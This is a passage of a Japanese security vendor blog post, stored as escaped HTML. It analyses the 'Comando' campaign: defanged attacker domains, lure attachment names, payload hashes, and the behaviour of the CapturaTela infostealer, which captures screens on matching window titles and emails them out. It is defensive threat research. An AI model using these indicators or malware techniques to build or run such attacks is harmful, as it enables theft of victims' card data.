\u3053\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306b\u95a2\u9023\u4ed8\u3051\u3089\u308c\u3066\u3044\u308b\u30c9\u30e1\u30a4\u30f3\u30b5\u30f3\u30d7\u30eb\u306e\u3046\u3061DDNS\u30d7\u30ed\u30d0\u30a4\u30c0\u3092\u4f7f\u7528\u3057\u3066\u3044\u308b\u3082\u306e<\/p>\n<p>\u7121\u6599\u30b5\u30fc\u30d3\u30b9\u3001\u30da\u30fc\u30b9\u30c8\u30b5\u30a4\u30c8\u3001\u4fb5\u5bb3\u3055\u308c\u305f\u30b5\u30a4\u30c8\u306a\u3069\u306e\u5229\u7528\u306b\u304f\u308f\u3048\u3066\u3001\u304a\u305d\u3089\u304f\u306f\u653b\u6483\u8005\u304c\u6240\u6709\u3057\u3066\u3044\u308b\u3068\u601d\u308f\u308c\u308b\u30c9\u30e1\u30a4\u30f3\u304c\u5c11\u306a\u304f\u3068\u30821\u3064\u7279\u5b9a\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u30c9\u30e1\u30a4\u30f3\"fejalconstrucoes[.]com[.]br\"\u306f\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30db\u30b9\u30c8\u3057\uff64\u6f5c\u5728\u7684\u306a\u88ab\u5bb3\u8005\u306b\u96fb\u5b50\u30e1\u30fc\u30eb\u3092\u9001\u4fe1\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3055\u308c\u3066\u304d\u307e\u3057\u305f\u3002\u56f37\u306f\uff64DNS WHOIS\u30ec\u30b3\u30fc\u30c9\u306b\u8868\u793a\u3055\u308c\u308b\u30c9\u30e1\u30a4\u30f3\u306e\u8a73\u7d30\u3067\u3059\uff61\u3053\u306e\u30c9\u30e1\u30a4\u30f3\u306f\u30d6\u30e9\u30b8\u30eb\u306eUOL\u30b5\u30fc\u30d3\u30b9\u3092\u5229\u7528\u3057\u3066\u767b\u9332\u3055\u308c\u3066\u3044\u307e\u3057\u305f\uff61<\/p>\n<figure id=\"attachment_101372\" aria-describedby=\"caption-attachment-101372\" style=\"width: 479px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-101372 size-full lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-178.png\" alt=\"\u56f37 DNS WHOIS\u30ec\u30b3\u30fc\u30c9\" width=\"479\" height=\"830\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-178.png 479w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-178-173x300.png 173w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-178-370x641.png 370w\" sizes=\"(max-width: 479px) 100vw, 479px\" \/><figcaption id=\"caption-attachment-101372\" class=\"wp-caption-text\">\u56f37 DNS WHOIS\u30ec\u30b3\u30fc\u30c9<\/figcaption><\/figure>\n<p>\u3053\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306b\u5c5e\u3059\u308b\u60aa\u610f\u306e\u3042\u308b\u6dfb\u4ed8\u30d5\u30a1\u30a4\u30eb\u4ed8\u304d\u306e\u96fb\u5b50\u30e1\u30fc\u30eb\u306f\u3001\u6b21\u306e\u3088\u3046\u306a\u7279\u5fb4\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\">\u30c9\u30e1\u30a4\u30f3: <span style=\"font-family: 'courier new', courier, monospace;\">fejalconstrucoes[.]com[.]br<\/span><br \/>\n\u9001\u4fe1\u8005: <span style=\"font-family: 'courier new', courier, monospace;\">mmcorrea@fejalconstrucoes.com.br, marcos@fejalconstrucoes.com.br<\/span><br \/>\n\u6dfb\u4ed8\u30d5\u30a1\u30a4\u30eb\u540d: <span style=\"font-family: 'courier new', courier, monospace;\">Contrato Anual FEJAL Constru\u00e7oes.ppa<\/span><\/p>\n<p>\u5148\u306b\u8ff0\u3079\u305f\u3088\u3046\u306b\u3001\u3053\u306e\u653b\u6483\u8005\u306f\uff64\u81ea\u8eab\u306e\u4f7f\u7528\u3059\u308b\u30c9\u30e1\u30a4\u30f3\u3084\u30d1\u30b9\u306b\u7e70\u308a\u8fd4\u3057\u982d\u5b57\u8a9e \u300cCDT\u300d\u3092\u4f7f\u7528\u3059\u308b\u3068\u3044\u3046\u8208\u5473\u6df1\u3044\u7279\u5fb4\u304c\u898b\u3089\u308c\u307e\u3059\uff61<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\">hxxp:\/\/bit[.]ly\/cdtqueda<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">hxxp:\/\/cdtoriginal.ddns[.]net<\/span><\/p>\n<h2>\u30d3\u30b8\u30cd\u30b9\u306b\u8ca2\u732e\u3059\u308b\u4e3b\u306a\u8981\u56e0\u306f\u300cCapturaTela\u300d<\/h2>\n<p>\u672c\u4ef6\u306e\u8abf\u67fb\u4e2d\uff64C2\u4e0a\u306b\u95b2\u89a7\u53ef\u80fd\u306a\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u304c\u898b\u3064\u304b\u308a\uff64\u3053\u3053\u304b\u3089\u653b\u6483\u8005\u304c\u4f7f\u7528\u3057\u305f\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u3044\u304f\u3064\u304b\u898b\u3064\u3051\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3057\u305f\u3002\u88683\u306b\uff64\u898b\u3064\u304b\u3063\u305f\u30da\u30a4\u30ed\u30fc\u30c9\u3068\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u306e\u7d44\u307f\u3042\u308f\u305b\u4e00\u89a7\u3092\u793a\u3057\u307e\u3059\u3002\u3053\u3053\u3067\u3082\u3084\u306f\u308a\u982d\u5b57\u8a9e \u300cCDT\u300d\u304c\u30d5\u30a1\u30a4\u30eb\u540d\u306b\u7e70\u308a\u8fd4\u3057\u5229\u7528\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<table>\n<tbody>\n<tr>\n<td style=\"width: 298px;\"><strong>\u30d5\u30a1\u30a4\u30eb\u540d<\/strong><\/td>\n<td style=\"width: 546px;\"><strong>SHA256<\/strong><\/td>\n<\/tr>\n<tr>\n<td style=\"width: 298px;\">CDT.hta<\/td>\n<td style=\"width: 546px;\">4485a8f339171ca86f7e38b912f0f28072ffe04404d5062af3a60f322566f870<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 298px;\">Copia Detalhe da reserva \u2013 Booking.ppam<\/p>\n<p>&nbsp;<\/td>\n<td style=\"width: 546px;\">ac70d15106cc368c571c3969c456778b494d62c5319dc366b7e2c116834c6187<\/p>\n<p>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 298px;\">DadosDaReserva.doc<\/p>\n<p>&nbsp;<\/td>\n<td style=\"width: 546px;\">03483d2e701f8f90c9cc46b37f12f1cef995e4cca4b5c4b9e67947f560275677<\/p>\n<p>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 298px;\">DillI.js<\/p>\n<p>&nbsp;<\/td>\n<td style=\"width: 546px;\">d5f4d7fb7c8042b047e9f3d93d5f02841f01889ba8a899c0c1ed7064129e3bb4<\/p>\n<p>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 298px;\">quasar.jse<\/p>\n<p>&nbsp;<\/td>\n<td style=\"width: 546px;\">03d7de252c30c87d6b156b4fbcdcd008ef6bae319a9c42613aaa01428bd490e3<\/p>\n<p>&nbsp;<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u88683 cdtmaster[.]com[.]br\u306e\u95b2\u89a7\u53ef\u80fd\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u3067\u78ba\u8a8d\u3067\u304d\u305f\u5185\u5bb9<\/p>\n<p>\u30d5\u30a1\u30a4\u30eb\u540d\u3053\u305d\u300cquasar.jse\u300d\u3068\u306a\u3063\u3066\u3044\u307e\u3059\u304c\uff64\u305d\u306e\u4e2d\u8eab\u306fQuasarRAT\u3067\u306f\u306a\u304f\uff64base64\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u305f\u30d9\u30fc\u30b7\u30c3\u30af\u306a\u30da\u30a4\u30ed\u30fc\u30c9\u30c9\u30ed\u30c3\u30d1\u30fc(\u56f38\u53c2\u7167)\u3092\u542b\u3080JS\u30b9\u30af\u30ea\u30d7\u30c8\u3067\u3057\u305f\uff61\u8abf\u67fb\u3057\u3066\u307f\u308b\u3068\uff64\u3054\u304f\u30b7\u30f3\u30d7\u30eb\u3067\u3059\u304c\u8208\u5473\u6df1\u3044\u30da\u30a4\u30ed\u30fc\u30c9\u304c\u898b\u3089\u308c\u307e\u3057\u305f\u3002<\/p>\n<figure id=\"attachment_101374\" aria-describedby=\"caption-attachment-101374\" style=\"width: 653px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-101374 size-full lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-179.png\" alt=\"\u56f38 base64\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u305f\u30da\u30a4\u30ed\u30fc\u30c9\u30c9\u30ed\u30c3\u30d1\u30fc\u3092\u542b\u3080JS\u30b9\u30af\u30ea\u30d7\u30c8\" width=\"653\" height=\"1025\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-179.png 653w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-179-191x300.png 191w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-179-652x1024.png 652w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-179-370x581.png 370w\" sizes=\"(max-width: 653px) 100vw, 653px\" \/><figcaption id=\"caption-attachment-101374\" class=\"wp-caption-text\">\u56f38 base64\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u305f\u30da\u30a4\u30ed\u30fc\u30c9\u30c9\u30ed\u30c3\u30d1\u30fc\u3092\u542b\u3080JS\u30b9\u30af\u30ea\u30d7\u30c8<\/figcaption><\/figure>\n<p>\u30c7\u30b3\u30fc\u30c9\u3055\u308c\u305f\u30da\u30a4\u30ed\u30fc\u30c9\u306f.NET\u3067\u4f5c\u6210\u3055\u308c\u305fPE\u30d5\u30a1\u30a4\u30eb\u3067\uff64\u60c5\u5831\u7a83\u53d6\u6a5f\u80fd\u3092\u5099\u3048\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u306a\u304b\u3067\u30e1\u30a4\u30f3\u3068\u306a\u308b\u30e1\u30bd\u30c3\u30c9\u306e1\u3064\u304c\u300cCapturaTela\u300d\u3067\uff64\u79c1\u305f\u3061\u306f\u3053\u3053\u304b\u3089\u30de\u30eb\u30a6\u30a7\u30a2\u30d5\u30a1\u30df\u30ea\u540d\u524d\u3092\u4ed8\u3051\u307e\u3057\u305f\uff61\u305d\u306e\u30dd\u30eb\u30c8\u30ac\u30eb\u8a9e\u306e\u540d\u524d\u304c\u793a\u3059\u3088\u3046\u306b\u3001\u3053\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u306f\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8\u3092Bitmap\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3068\u3057\u3066\u4fdd\u5b58\u3059\u308b\u6a5f\u80fd\u3092\u5099\u3048\u3066\u3044\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_101376\" aria-describedby=\"caption-attachment-101376\" style=\"width: 1024px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-101376 size-large lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-180-1024x200.png\" alt=\"\u56f39 CapturaTela\u30e1\u30bd\u30c3\u30c9\u306e\u30b9\u30af\u30ea\u30fc\u30f3\u30ad\u30e3\u30d7\u30c1\u30e3\u6a5f\u80fd\" width=\"1024\" height=\"200\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-180-1024x200.png 1024w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-180-300x58.png 300w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-180-768x150.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-180-900x175.png 900w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-180-370x72.png 370w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-180.png 1436w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption id=\"caption-attachment-101376\" class=\"wp-caption-text\">\u56f39 CapturaTela\u30e1\u30bd\u30c3\u30c9\u306e\u30b9\u30af\u30ea\u30fc\u30f3\u30ad\u30e3\u30d7\u30c1\u30e3\u6a5f\u80fd<\/figcaption><\/figure>\n<p>\u3053\u306e\u60c5\u5831\u7a83\u53d6\u7528\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306e\u4e3b\u306a\u6a5f\u80fd\u306f\u6b21\u306e\u3068\u304a\u308a\u3067\u3059(\u56f310\u3092\u53c2\u7167)\u3002<\/p>\n<ul>\n<li>\u958b\u3044\u3066\u3044\u308b\u30d7\u30ed\u30bb\u30b9\u306e\u30ea\u30b9\u30c8\u3092\u9806\u306b\u78ba\u8a8d\u3057\u3001\u7279\u5b9a\u306e\u30a6\u30a3\u30f3\u30c9\u30a6\u30bf\u30a4\u30c8\u30eb\u3092\u63a2\u3057\u307e\u3059\u3002\u5bfe\u8c61\u3068\u306a\u308b\u30bf\u30a4\u30c8\u30eb\u306b\u300cls . B\u300d\u307e\u305f\u306f\u300co . B\u300d\u3068\u3044\u3046\u6587\u5b57\u5217\u304c\u542b\u307e\u308c\u3066\u3044\u308c\u3070\uff64\u6b21\u306e\u6d3b\u52d5\u3092\u5b9f\u65bd\u3057\u307e\u3059\uff61<\/li>\n<li>\u3053\u308c\u3089\u306e\u6761\u4ef6\u3092\u6e80\u305f\u3059\u30bf\u30a4\u30c8\u30eb\u304c\u898b\u3064\u304b\u308c\u3070\uff64\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8\u304c\u64ae\u5f71\u3055\u308c\u3001JPEG\u6dfb\u4ed8\u30d5\u30a1\u30a4\u30eb\u3068\u3057\u3066\u96fb\u5b50\u30e1\u30fc\u30eb\u3067\u9001\u4fe1\u3055\u308c\u307e\u3059(\u56f312\u3092\u53c2\u7167)\u3002<\/li>\n<li>\u5b8c\u4e86\u3059\u308b\u3068\u3001\u65e2\u5b58\u306eChrome\u30d7\u30ed\u30bb\u30b9\u3092\u5f37\u5236\u7d42\u4e86\u3057\u307e\u3059\u3002\u30a6\u30a3\u30f3\u30c9\u30a6\u306e\u30bf\u30a4\u30c8\u30eb\u306f\u3001\u304a\u305d\u3089\u304fChrome\u306e\u30bf\u30b0\u306e\u5185\u5bb9\u306b\u57fa\u3065\u3044\u305f\u3082\u306e\u3067\u3057\u3087\u3046\u3002<\/li>\n<\/ul>\n<figure id=\"attachment_101378\" aria-describedby=\"caption-attachment-101378\" style=\"width: 1024px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-101378 size-large lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-181-1024x526.png\" alt=\"\u56f310 CapturaTela\u3067\u4e3b\u306a\u6a5f\u80fd\u3092\u5b9f\u884c\u3059\u308b\u30eb\u30fc\u30d7\" width=\"1024\" height=\"526\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-181-1024x526.png 1024w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-181-300x154.png 300w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-181-768x394.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-181-900x462.png 900w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-181-370x190.png 370w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-181.png 1624w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption id=\"caption-attachment-101378\" class=\"wp-caption-text\">\u56f310 CapturaTela\u3067\u4e3b\u306a\u6a5f\u80fd\u3092\u5b9f\u884c\u3059\u308b\u30eb\u30fc\u30d7<\/figcaption><\/figure>\n<figure id=\"attachment_101380\" aria-describedby=\"caption-attachment-101380\" style=\"width: 1024px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-101380 size-large lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-182-1024x811.png\" alt=\"\u56f311 CapturaTela\u306e\u96fb\u5b50\u30e1\u30fc\u30eb\u62bd\u51fa\u3092\u5b9f\u884c\u3057\u3066\u3044\u308b\u90e8\u5206\" width=\"1024\" height=\"811\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-182-1024x811.png 1024w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-182-300x237.png 300w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-182-768x608.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-182-900x712.png 900w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-182-370x293.png 370w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-182.png 1276w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption id=\"caption-attachment-101380\" class=\"wp-caption-text\">\u56f311 CapturaTela\u306e\u96fb\u5b50\u30e1\u30fc\u30eb\u62bd\u51fa\u3092\u5b9f\u884c\u3057\u3066\u3044\u308b\u90e8\u5206<\/figcaption><\/figure>\n<p>CapturaTela\u306e\u6a5f\u80fd\u3092\u691c\u8a3c\u3059\u308b\u305f\u3081\u3001\u79c1\u305f\u3061\u306f\u30bf\u30a4\u30c8\u30eb\u306b\u5148\u306e\u6761\u4ef6\u306b\u4e00\u81f4\u3059\u308b\u6587\u5b57\u5217\u3092\u542b\u3081\u305f\u30b7\u30f3\u30d7\u30eb\u306aWeb\u30da\u30fc\u30b8\u3068\u691c\u8a3c\u7528\u306e\u96fb\u5b50\u30e1\u30fc\u30eb\u30a2\u30ab\u30a6\u30f3\u30c8\u3092\u7528\u610f\u3057\u3001\u60aa\u610f\u306e\u3042\u308b\u30b5\u30f3\u30d7\u30eb\u306b\u30d1\u30c3\u30c1\u3092\u5f53\u3066\u307e\u3057\u305f(\u56f312\u3092\u53c2\u7167)\u3002<\/p>\n<figure id=\"attachment_101382\" aria-describedby=\"caption-attachment-101382\" style=\"width: 1024px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-101382 size-large lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-183-1024x450.png\" alt=\"\u56f312 \u30c6\u30b9\u30c8\u7528HTML\u30da\u30fc\u30b8\u3067CapturaTela\u6a5f\u80fd\u306e\u30c7\u30d0\u30c3\u30b0\u3092\u3057\u3066\u3044\u308b\u3068\u3053\u308d\" width=\"1024\" height=\"450\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-183-1024x450.png 1024w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-183-300x132.png 300w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-183-768x338.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-183-900x396.png 900w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-183-370x163.png 370w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-183.png 1992w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption id=\"caption-attachment-101382\" class=\"wp-caption-text\">\u56f312 \u30c6\u30b9\u30c8\u7528HTML\u30da\u30fc\u30b8\u3067CapturaTela\u6a5f\u80fd\u306e\u30c7\u30d0\u30c3\u30b0\u3092\u3057\u3066\u3044\u308b\u3068\u3053\u308d<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p>\u3053\u306e\u7d50\u679c\u3001\u56f313\u306b\u793a\u3059\u3068\u304a\u308a\u3001\u653b\u6483\u8005\u304c\u88ab\u5bb3\u8005\u304b\u3089\u53ce\u96c6\u3057\u3088\u3046\u3068\u3057\u305f\u60c5\u5831\u3092\u62bd\u51fa\u3059\u308b\u969b\u306e\u5f62\u5f0f\u3068\u5185\u5bb9\u3092\u78ba\u8a8d\u3067\u304d\u307e\u3057\u305f\u3002<\/p>\n<figure id=\"attachment_101384\" aria-describedby=\"caption-attachment-101384\" style=\"width: 883px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-101384 size-full lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-184.png\" alt=\"\u56f313 \u62bd\u51fa\u3055\u308c\u305f\u30c7\u30fc\u30bf\u3092\u542b\u3080\u96fb\u5b50\u30e1\u30fc\u30eb\u3092\u53d7\u4fe1\" width=\"883\" height=\"363\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-184.png 883w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-184-300x123.png 300w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-184-768x316.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-184-370x152.png 370w\" sizes=\"(max-width: 883px) 100vw, 883px\" \/><figcaption id=\"caption-attachment-101384\" class=\"wp-caption-text\">\u56f313 \u62bd\u51fa\u3055\u308c\u305f\u30c7\u30fc\u30bf\u3092\u542b\u3080\u96fb\u5b50\u30e1\u30fc\u30eb\u3092\u53d7\u4fe1<\/figcaption><\/figure>\n<p>\u3053\u3053\u307e\u3067\u306e\u8abf\u67fb\u3067\u6b8b\u3063\u305f\u552f\u4e00\u306e\u7591\u554f\u306f\u300c\u60c5\u5831\u7a83\u53d6\u7528\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u304c\u63a2\u3057\u3066\u3044\u305f\u30b3\u30f3\u30c6\u30f3\u30c4\u306e\u7a2e\u985e\u3068\u30a6\u30a3\u30f3\u30c9\u30a6\u306e\u30bf\u30a4\u30c8\u30eb\u306f\u4f55\u3060\u3063\u305f\u306e\u304b\u300d\u3068\u3044\u3046\u3053\u3068\u3067\u3059\uff61\u3069\u3046\u3044\u3063\u305f\u7a2e\u985e\u306eWeb\u30da\u30fc\u30b8\u304c\u300cls \u00b7 B\u300d\u306a\u3044\u3057\u300co\u00b7 B\u300d\u7d99\u7d9a\u6575\u3068\u3044\u3046\u6587\u5b57\u5217\u3092\u30bf\u30a4\u30c8\u30eb\u306b\u542b\u3080\u306e\u3067\u3057\u3087\u3046\u304b\uff61<\/p>\n<p>\u5f53\u521d\uff64\u3053\u3046\u3057\u305f\u7279\u5fb4\u3092\u6301\u3064Web\u30b5\u30a4\u30c8\u3092\u898b\u3064\u3051\u308b\u306e\u306f\u307e\u305a\u7121\u7406\u3067\u306f\u306a\u3044\u304b\u3068\u601d\u308f\u308c\u307e\u3057\u305f\u304c\uff64\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306e\u8a2d\u5b9a\u3057\u305f\u6a19\u7684\u3084\u96fb\u5b50\u30e1\u30fc\u30eb\u914d\u4fe1\u30bb\u30c3\u30b7\u30e7\u30f3\u306e\u30e1\u30bf\u30c7\u30fc\u30bf\u306a\u3069\u306e\u5206\u304b\u3063\u3066\u3044\u308b\u3053\u3068\u304b\u3089\u8abf\u67fb\u3092\u958b\u59cb\u3057\u307e\u3057\u305f\u3002\u3053\u306e\u30c7\u30fc\u30bf\u304b\u3089\u3001\u82f1\u8a9e\u3068\u30dd\u30eb\u30c8\u30ac\u30eb\u8a9e\u306e\u4e21\u65b9\u3067\u3001Web\u30b5\u30a4\u30c8\u306e\u30da\u30fc\u30b8\u30bf\u30a4\u30c8\u30eb\u306b\u7279\u5b9a\u306e(\u305f\u3060\u3057\u696d\u754c\u3068\u696d\u754c\u306e\u6027\u8cea\u306b\u5171\u901a\u306e)\u7528\u8a9e\u3092\u542b\u3080\u6f5c\u5728\u7684\u306a\u30bf\u30fc\u30b2\u30c3\u30c8Web\u30b5\u30a4\u30c8\u3092\u7279\u5b9a\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3057\u305f\u3002\u305d\u3057\u3066\uff64\u3053\u306e\u7528\u8a9e\u304c\u542b\u307e\u308c\u3066\u3044\u308c\u3070\uff64\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u30af\u30ec\u30b8\u30c3\u30c8\u30ab\u30fc\u30c9\u7a83\u53d6\u6a5f\u80fd\u304c\u547c\u3073\u51fa\u3055\u308c\u308b\u306e\u3067\u3059\u3002\u898b\u3064\u304b\u3063\u305fWeb\u30b5\u30a4\u30c8\u304b\u3089\u3001\u653b\u6483\u8005\u306f\u7279\u5b9a\u306e\u8cfc\u5165\u30d7\u30ed\u30bb\u30b9\u306b\u304a\u3044\u3066\u88ab\u5bb3\u8005\u306e\u30af\u30ec\u30b8\u30c3\u30c8\u30ab\u30fc\u30c9\u60c5\u5831\u3092\u3059\u3079\u3066\u53d6\u5f97\u3059\u308b\u3053\u3068\u306b\u91cd\u70b9\u3092\u304a\u3044\u3066\u3044\u308b\u3053\u3068\u304c\u5206\u304b\u308a\u307e\u3057\u305f\u3002<\/p>\n<p>\u3044\u304f\u3064\u304b\u306eCapturaTela\u30b5\u30f3\u30d7\u30eb\u3092\u5206\u6790\u3057\u3001\u96fb\u5b50\u30e1\u30fc\u30eb\u306e\u8a2d\u5b9a\u90e8\u5206\u306e\u5185\u5bb9\u3092\u62bd\u51fa\u3059\u308b\u3068\u3001\u88684\u306b\u793a\u3059\u3068\u304a\u308a\u8208\u5473\u6df1\u3044\u6587\u5b57\u5217\u304c\u8907\u6570\u898b\u3064\u304b\u308a\u307e\u3057\u305f\u3002<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>\u8208\u5473\u6df1\u3044\u6587\u5b57\u5217<\/strong><\/td>\n<\/tr>\n<tr>\n<td>Comando30<\/td>\n<\/tr>\n<tr>\n<td>Comando30@cdt<\/td>\n<\/tr>\n<tr>\n<td>comando50<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u88684 \u96fb\u5b50\u30e1\u30fc\u30eb\u306e\u8a2d\u5b9a\u306b\u542b\u307e\u308c\u3066\u3044\u305f\u8208\u5473\u6df1\u3044\u6587\u5b57\u5217<\/p>\n<p>\u653b\u6483\u8005\u304c\u7e70\u308a\u8fd4\u3057\u300cCDT\u300d\u3068\u3044\u3046\u982d\u5b57\u8a9e\u4f7f\u7528\u3057\u3066\u3044\u308b\u3053\u3068\uff64\u300cCoManDo\u300d\u3068\u3044\u3046\u5358\u8a9e\u306e\u5404\u97f3\u7bc0\u304cCDT\u306e\u6700\u521d\u306e\u6587\u5b57\u306b\u7d10\u4ed8\u304f\u3053\u3068\uff64\u3053\u308c\u3089\u306e\u7279\u5fb4\u304b\u3089\uff64\u79c1\u305f\u3061\u306f\u3053\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3092\u300cComando\u4f5c\u6226\u300d\u3068\u3044\u3046\u540d\u524d\u3067\u8aac\u660e\u3059\u308b\u3053\u3068\u306b\u3057\u307e\u3057\u305f\u3002<\/p>\n<h2>\u30ea\u30e2\u30fc\u30c8\u30a2\u30af\u30bb\u30b9\u7528\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u3092\u591a\u7528<\/h2>\n<p>\u3053\u306e\u653b\u6483\u8005\u306f\u30ab\u30b9\u30bf\u30e0\u4f5c\u6210\u3057\u305f\u30c8\u30ed\u30a4\u306e\u6728\u99acCapturaTela\u306e\u307b\u304b\u306b\u4f55\u7a2e\u985e\u3082\u306e\u30ea\u30e2\u30fc\u30c8\u30a2\u30af\u30bb\u30b9\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u3092\u4f7f\u3063\u3066\u60aa\u610f\u306e\u3042\u308b\u6d3b\u52d5\u3092\u884c\u3063\u3066\u3044\u307e\u3059\u3002\u6b21\u306eRAT\u30de\u30eb\u30a6\u30a7\u30a2\u30d5\u30a1\u30df\u30ea\u306f\u540c\u653b\u6483\u8005\u306b\u3088\u308b\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u6d3b\u52d5\u4e2d\u306b\u89b3\u6e2c\u3055\u308c\u305f\u3082\u306e\u3067\u3059\u3002<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>RAT\u30d5\u30a1\u30df\u30ea<\/strong><\/td>\n<\/tr>\n<tr>\n<td>LimeRAT<\/td>\n<\/tr>\n<tr>\n<td>RevengeRAT<\/td>\n<\/tr>\n<tr>\n<td>NjRAT<\/td>\n<\/tr>\n<tr>\n<td>AsyncRAT<\/td>\n<\/tr>\n<tr>\n<t